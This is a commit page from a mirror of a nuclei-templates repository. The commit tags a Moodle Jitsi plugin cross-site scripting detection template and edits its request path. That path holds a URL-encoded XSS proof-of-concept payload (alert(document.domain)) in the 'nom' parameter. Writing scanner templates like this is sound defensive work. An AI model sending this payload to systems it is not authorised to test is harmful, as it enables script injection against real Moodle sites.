daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

template update

patch-1
sandeep 2021-04-10 13:10:29 +05:30
parent 6b7cc89a97
commit b36ec072d6
2 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.nuclei-ignore
View File

@ -13,6 +13,7 @@ tags:
- "iot"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.

4
vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml
View File

@ -5,13 +5,13 @@ info:
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
severity: medium
tags: moodle,jitsi,xss
tags: moodle,jitsi,xss,revision
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
requests:
- method: GET
path:
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
matchers-condition: and
matchers: